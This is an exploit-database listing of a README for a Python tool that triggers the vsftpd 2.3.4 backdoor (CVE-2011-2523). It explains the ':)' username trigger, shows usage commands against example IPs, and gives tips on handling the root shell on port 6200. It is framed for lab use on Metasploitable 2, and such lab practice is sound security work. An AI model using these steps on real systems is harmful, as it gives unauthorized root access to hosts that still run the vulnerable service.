Exploit for OS Command Injection in Vsftpd_Project Vsftpd CVE-2011-2523

Name: Exploit for OS Command Injection in Vsftpd_Project Vsftpd CVE-2011-2523
Rating: 5 (4 reviews)
2026-06-05 | CVSS 10.0
## https://sploitus.com/exploit?id=A7A90EE8-8AB4-5A6C-B232-E81EB21F6397
# vsftpd 2.3.4 Backdoor Exploit

A small, dependency-free Python 3 exploit for the **vsftpd 2.3.4 backdoor**
(**CVE-2011-2523**). It triggers the backdoor over FTP and drops you into an
interactive root shell on the spawned listener.

Written as a modern replacement for old exploit scripts which depended on
`telnetlib` — removed from the standard library in Python 3.13. This version
uses only the standard library and reads the shell with `select` instead of a
fixed sleep, so output doesn't get truncated.

> ⚠️ **For authorized use only.** This targets a known-vulnerable service and is
> intended for security education and lab environments such as **Metasploitable 2**.
> Only run it against systems you own or have explicit written permission to test.

## How it works

vsftpd 2.3.4 shipped with a malicious backdoor: any FTP username containing the
sequence `:)` causes the daemon to bind a root shell on **TCP/6200**. The script:

1. (Optionally) grabs the FTP banner and checks for `vsftpd 2.3.4`.
2. Sends `USER :)` / `PASS ` to trip the backdoor.
3. Connects to port 6200 (with retries while the listener binds) and drops you
   into an interactive shell, confirming privilege with `id; uname -a`.

## Requirements

- Python 3.x (standard library only — no external packages)

## Usage

```bash
python3 vsftpd_backdoor.py  [-p FTP_PORT] [-s SHELL_PORT] [--skip-verify]
```

Examples:

```bash
# Default: FTP on 21, backdoor shell on 6200, verify banner first
python3 vsftpd_backdoor.py 192.168.243.114

# Non-standard FTP port, skip the banner check
python3 vsftpd_backdoor.py 192.168.243.114 -p 2121 --skip-verify
```

Type commands at the `vsftpd#` prompt; type `exit` (or Ctrl-C) to quit.

## Good to know — port 6200 is a mutex

The backdoor is **one-shot per trigger**: the first connection to 6200 is handed
the shell, and that shell holds the port for as long as it stays open. Nothing
ever accepts a second connection.

Practical consequences:

- **One client at a time.** Don't run this script, `nc`, and Metasploit against
  the same target simultaneously — they'll fight over the single shell slot and
  you'll get confusing failures ("not a fresh shell", connection refused, etc.).
- **Exit cleanly.** Leave the shell with `exit` so the remote process dies and
  releases 6200. Killing the client uncleanly can orphan the process and leave
  the port stuck open.

### Resetting a stuck backdoor

If 6200 is already bound (port open but no usable shell), reset the target:

```bash
# On the target console
sudo netstat -tlnp | grep 6200
sudo kill -9 
```

Or simply reboot the VM for a guaranteed-clean, untriggered backdoor.

## License

Distributed under the MIT License. See `LICENSE` for more information.